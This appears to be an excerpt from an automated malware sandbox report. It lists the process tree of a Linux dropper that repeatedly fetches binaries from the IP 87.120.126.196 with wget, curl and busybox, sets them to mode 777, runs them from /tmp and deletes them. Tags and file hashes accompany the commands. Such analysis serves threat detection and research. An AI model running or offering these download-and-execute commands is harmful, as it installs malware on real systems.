/usr/bin/curlcurl -O http://87.120.126.196/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:942
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ02⤵PID:943
-
-
/bin/chmodchmod 777 OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ02⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ0./OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ02⤵
- Executes dropped EXE
PID:945
-
-
/bin/rmrm OLQTKU80BQ6RsNakpbAKMxm7ARuxWYTBJ02⤵PID:946
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt62⤵PID:947
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:948
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt62⤵PID:949
-
-
/bin/chmodchmod 777 tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt62⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt6./tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt62⤵
- Executes dropped EXE
PID:951
-
-
/bin/rmrm tDXUg54ZTfCmBJpXB9THuST31mDEgQnlt62⤵PID:952
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵PID:953
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:954
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵PID:955
-
-
/bin/chmodchmod 777 Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵
- File and Directory Permissions Modification
PID:956
-
-
/tmp/Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe./Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵
- Executes dropped EXE
PID:957
-
-
/bin/rmrm Bw9FwmuNu5yhrovnWKa7TGfXsiYxWtTYVe2⤵PID:958
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵PID:959
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:960
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵PID:961
-
-
/bin/chmodchmod 777 s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E./s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm s4eiAeJbVOtA7REWAKXwOXg61d7nxnU37E2⤵PID:964
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵PID:965
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵PID:967
-
-
/bin/chmodchmod 777 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT./1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵
- Executes dropped EXE
PID:969
-
-
/bin/rmrm 1TKbpsdp0Cc9JSXNELZO7XsQNdS5gHELdT2⤵PID:970
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵PID:971
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:972
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵PID:973
-
-
/bin/chmodchmod 777 MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵
- File and Directory Permissions Modification
PID:974
-
-
/tmp/MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz./MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵
- Executes dropped EXE
PID:975
-
-
/bin/rmrm MpblHBdxiOXAAjf6OnKGTKaWchT6ohmBiz2⤵PID:976
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵PID:977
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵
- Reads runtime system information
- Writes file to tmp directory
PID:978
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵PID:979
-
-
/bin/chmodchmod 777 ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵
- File and Directory Permissions Modification
PID:980
-
-
/tmp/ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A6319./ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵
- Executes dropped EXE
PID:981
-
-
/bin/rmrm ZGlBWqdg7Jh2tPq4eyZpD3PDPgzB5A63192⤵PID:982
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97